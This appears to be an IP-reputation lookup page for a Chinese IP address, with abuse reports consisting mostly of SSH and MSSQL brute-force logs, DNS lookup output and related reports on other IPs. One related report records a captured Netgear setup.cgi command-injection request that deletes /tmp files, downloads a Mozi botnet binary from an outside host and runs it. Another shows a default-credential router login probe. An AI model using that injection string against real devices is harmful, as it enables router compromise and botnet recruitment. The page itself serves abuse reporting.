222.242.104.61

Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: ChinaNet Hunan Province Network

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbotsspam	DATE:2020-08-26 14:33:39, IP:222.242.104.61, PORT:1433 MSSQL brute force auth on honeypot server (honey-neo-dc)	2020-08-27 03:45:05

Comments on same subnet:

IP	Type	Details	Datetime
222.242.104.188	attackbotsspam	fail2ban	2020-04-01 04:23:25
222.242.104.188	attack	Nov 16 00:12:29 hpm sshd\[18774\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 user=root Nov 16 00:12:31 hpm sshd\[18774\]: Failed password for root from 222.242.104.188 port 45760 ssh2 Nov 16 00:17:28 hpm sshd\[19172\]: Invalid user rosicler from 222.242.104.188 Nov 16 00:17:28 hpm sshd\[19172\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Nov 16 00:17:30 hpm sshd\[19172\]: Failed password for invalid user rosicler from 222.242.104.188 port 51478 ssh2	2019-11-16 19:34:28
222.242.104.188	attackspam	Nov 13 13:53:12 hpm sshd\[5519\]: Invalid user sutarwala from 222.242.104.188 Nov 13 13:53:12 hpm sshd\[5519\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Nov 13 13:53:14 hpm sshd\[5519\]: Failed password for invalid user sutarwala from 222.242.104.188 port 56791 ssh2 Nov 13 13:57:58 hpm sshd\[5922\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 user=root Nov 13 13:58:00 hpm sshd\[5922\]: Failed password for root from 222.242.104.188 port 51000 ssh2	2019-11-14 08:07:25
222.242.104.188	attackbots	Nov 8 06:06:30 meumeu sshd[19092]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Nov 8 06:06:32 meumeu sshd[19092]: Failed password for invalid user resume from 222.242.104.188 port 54851 ssh2 Nov 8 06:12:51 meumeu sshd[19872]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 ...	2019-11-08 14:12:47
222.242.104.188	attack	2019-11-07T11:11:10.554164scmdmz1 sshd\[29526\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 user=root 2019-11-07T11:11:12.512936scmdmz1 sshd\[29526\]: Failed password for root from 222.242.104.188 port 59924 ssh2 2019-11-07T11:16:01.039682scmdmz1 sshd\[29905\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 user=root ...	2019-11-07 21:24:17
222.242.104.188	attack	2019-10-30T15:29:50.282978hub.schaetter.us sshd\[28759\]: Invalid user anuj from 222.242.104.188 port 41408 2019-10-30T15:29:50.289762hub.schaetter.us sshd\[28759\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 2019-10-30T15:29:52.035219hub.schaetter.us sshd\[28759\]: Failed password for invalid user anuj from 222.242.104.188 port 41408 ssh2 2019-10-30T15:36:57.159287hub.schaetter.us sshd\[28790\]: Invalid user 123a from 222.242.104.188 port 55496 2019-10-30T15:36:57.167451hub.schaetter.us sshd\[28790\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 ...	2019-10-30 23:51:21
222.242.104.188	attack	Invalid user biadmin from 222.242.104.188 port 43769	2019-10-20 01:28:00
222.242.104.188	attack	Oct 15 01:41:19 web9 sshd\[7301\]: Invalid user woods from 222.242.104.188 Oct 15 01:41:19 web9 sshd\[7301\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Oct 15 01:41:22 web9 sshd\[7301\]: Failed password for invalid user woods from 222.242.104.188 port 50234 ssh2 Oct 15 01:47:51 web9 sshd\[8198\]: Invalid user bitch from 222.242.104.188 Oct 15 01:47:51 web9 sshd\[8198\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188	2019-10-15 20:00:49
222.242.104.188	attackbots	Sep 22 02:02:32 xtremcommunity sshd\[349941\]: Invalid user squ1sh from 222.242.104.188 port 47312 Sep 22 02:02:32 xtremcommunity sshd\[349941\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Sep 22 02:02:33 xtremcommunity sshd\[349941\]: Failed password for invalid user squ1sh from 222.242.104.188 port 47312 ssh2 Sep 22 02:09:05 xtremcommunity sshd\[350102\]: Invalid user norberta from 222.242.104.188 port 58837 Sep 22 02:09:05 xtremcommunity sshd\[350102\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 ...	2019-09-22 14:18:17
222.242.104.188	attack	Triggered by Fail2Ban at Vostok web server	2019-09-11 04:04:15
222.242.104.188	attackbotsspam	Sep 7 05:59:17 lcprod sshd\[10185\]: Invalid user 1234 from 222.242.104.188 Sep 7 05:59:17 lcprod sshd\[10185\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Sep 7 05:59:19 lcprod sshd\[10185\]: Failed password for invalid user 1234 from 222.242.104.188 port 59290 ssh2 Sep 7 06:06:52 lcprod sshd\[10824\]: Invalid user 123 from 222.242.104.188 Sep 7 06:06:52 lcprod sshd\[10824\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188	2019-09-08 00:19:48
222.242.104.188	attackspam	Sep 6 06:52:09 game-panel sshd[32248]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Sep 6 06:52:11 game-panel sshd[32248]: Failed password for invalid user teamspeak3 from 222.242.104.188 port 51463 ssh2 Sep 6 06:57:48 game-panel sshd[32472]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188	2019-09-06 15:07:28
222.242.104.188	attackspambots	Sep 6 02:03:15 eventyay sshd[19877]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Sep 6 02:03:17 eventyay sshd[19877]: Failed password for invalid user 123 from 222.242.104.188 port 59523 ssh2 Sep 6 02:07:56 eventyay sshd[20000]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 ...	2019-09-06 08:17:53
222.242.104.188	attack	Aug 15 09:03:55 xtremcommunity sshd\[12127\]: Invalid user rs from 222.242.104.188 port 54382 Aug 15 09:03:55 xtremcommunity sshd\[12127\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Aug 15 09:03:57 xtremcommunity sshd\[12127\]: Failed password for invalid user rs from 222.242.104.188 port 54382 ssh2 Aug 15 09:10:37 xtremcommunity sshd\[12496\]: Invalid user tisha from 222.242.104.188 port 49137 Aug 15 09:10:37 xtremcommunity sshd\[12496\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 ...	2019-08-15 21:15:23
222.242.104.188	attackbots	Aug 14 21:41:12 MK-Soft-VM3 sshd\[14914\]: Invalid user pussy from 222.242.104.188 port 52172 Aug 14 21:41:12 MK-Soft-VM3 sshd\[14914\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.242.104.188 Aug 14 21:41:14 MK-Soft-VM3 sshd\[14914\]: Failed password for invalid user pussy from 222.242.104.188 port 52172 ssh2 ...	2019-08-15 06:11:08

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 222.242.104.61
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 11830
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;222.242.104.61.			IN	A

;; AUTHORITY SECTION:
.			387	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020082601 1800 900 604800 86400

;; Query time: 27 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Aug 27 03:45:02 CST 2020
;; MSG SIZE  rcvd: 118

Host info

Host 61.104.242.222.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 61.104.242.222.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
119.118.128.21	attack	23/tcp [2020-09-30]1pkt	2020-10-01 12:03:57
212.70.149.52	attack	Oct 1 06:17:47 cho postfix/smtpd[3980224]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Oct 1 06:18:12 cho postfix/smtpd[3980268]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Oct 1 06:18:38 cho postfix/smtpd[3980268]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Oct 1 06:19:04 cho postfix/smtpd[3980268]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Oct 1 06:19:29 cho postfix/smtpd[3980268]: warning: unknown[212.70.149.52]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 ...	2020-10-01 12:22:28
104.248.1.92	attackbotsspam	2020-09-30T12:52:23.576159correo.[domain] sshd[8106]: Failed password for invalid user test from 104.248.1.92 port 57110 ssh2 2020-09-30T13:02:25.981878correo.[domain] sshd[9162]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.1.92 user=root 2020-09-30T13:02:27.670510correo.[domain] sshd[9162]: Failed password for root from 104.248.1.92 port 52250 ssh2 ...	2020-10-01 08:59:30
87.251.70.83	attackspam	port scan and connect, tcp 8080 (http-proxy)	2020-10-01 12:17:34
49.234.87.24	attackbots	SSH invalid-user multiple login attempts	2020-10-01 12:22:01
201.249.182.130	attack	445/tcp 445/tcp [2020-09-30]2pkt	2020-10-01 12:22:59
85.204.246.185	attackbots	Oct 1 04:15:20 mavik sshd[29522]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=85.204.246.185 Oct 1 04:15:22 mavik sshd[29522]: Failed password for invalid user joao from 85.204.246.185 port 59478 ssh2 Oct 1 04:21:19 mavik sshd[29824]: Invalid user test from 85.204.246.185 Oct 1 04:21:19 mavik sshd[29824]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=85.204.246.185 Oct 1 04:21:20 mavik sshd[29824]: Failed password for invalid user test from 85.204.246.185 port 41780 ssh2 ...	2020-10-01 12:06:02
111.125.120.235	attackbotsspam	WordPress wp-login brute force :: 111.125.120.235 0.096 BYPASS [30/Sep/2020:20:41:48 0000] [censored_2] "POST /wp-login.php HTTP/1.1" 200 2577 "https://[censored_2]/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"	2020-10-01 12:21:41
177.154.226.89	attackspam	(smtpauth) Failed SMTP AUTH login from 177.154.226.89 (BR/Brazil/-): 1 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_TRIGGER; Logs: 2020-10-01 00:11:51 plain authenticator failed for ([177.154.226.89]) [177.154.226.89]: 535 Incorrect authentication data (set_id=info)	2020-10-01 12:10:48
62.28.217.62	attackbots	Oct 1 05:46:54 hidden sshd[24534]: Failed password for invalid user oracle from 62.28.217.62 port 62250 ssh2 Oct 1 05:52:28 hidden sshd[27010]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=62.28.217.62 user=root Oct 1 05:52:31 hidden sshd[27010]: Failed password for hidden from 62.28.217.62 port 52746 ssh2	2020-10-01 12:06:21
103.79.165.153	attack	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.79.165.153:45258/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0	2020-10-01 09:09:43
115.63.37.156	attackbots	/boaform/admin/formLogin%3Fusername=user%26psd=user	2020-10-01 09:05:00
222.223.32.228	attackspambots	Sep 30 22:44:55 ajax sshd[20004]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.223.32.228 Sep 30 22:44:58 ajax sshd[20004]: Failed password for invalid user bala from 222.223.32.228 port 50048 ssh2	2020-10-01 12:01:26
54.79.183.95	spamattack	54.79.183.95 - - [01/Oct/2020:11:23:32 +1000] "GET /NlpsnoP83Wm7 HTTP/1.1" 404 28236 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" 54.79.183.95 - - [01/Oct/2020:11:23:34 +1000] "GET /kwhEYwj0hOyL.php HTTP/1.1" 404 28182 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" 54.79.183.95 - - [01/Oct/2020:11:23:33 +1000] "GET /KlaebCadFcK1/ HTTP/1.1" 404 28181 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" 54.79.183.95 - - [01/Oct/2020:11:23:32 +1000] "GET /NlpsnoP83Wm7 HTTP/1.1" 404 28236 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"	2020-10-01 11:46:34
94.153.224.202	attackspam	2020-09-30T15:09:13.986535727Z wordpress(ufrj.br): Blocked username authentication attempt for [login] from 94.153.224.202 ...	2020-10-01 09:05:29

Recently Reported IPs

177.245.54.6	176.225.32.67	136.167.148.144	77.164.211.21
13.229.51.54	5.181.211.212	238.117.246.9	84.31.254.192
27.106.135.61	133.227.136.70	203.228.78.99	8.86.155.214
2.166.18.178	28.71.76.171	43.237.21.32	189.92.64.209
122.124.70.150	40.56.220.202	202.164.130.83	141.119.119.72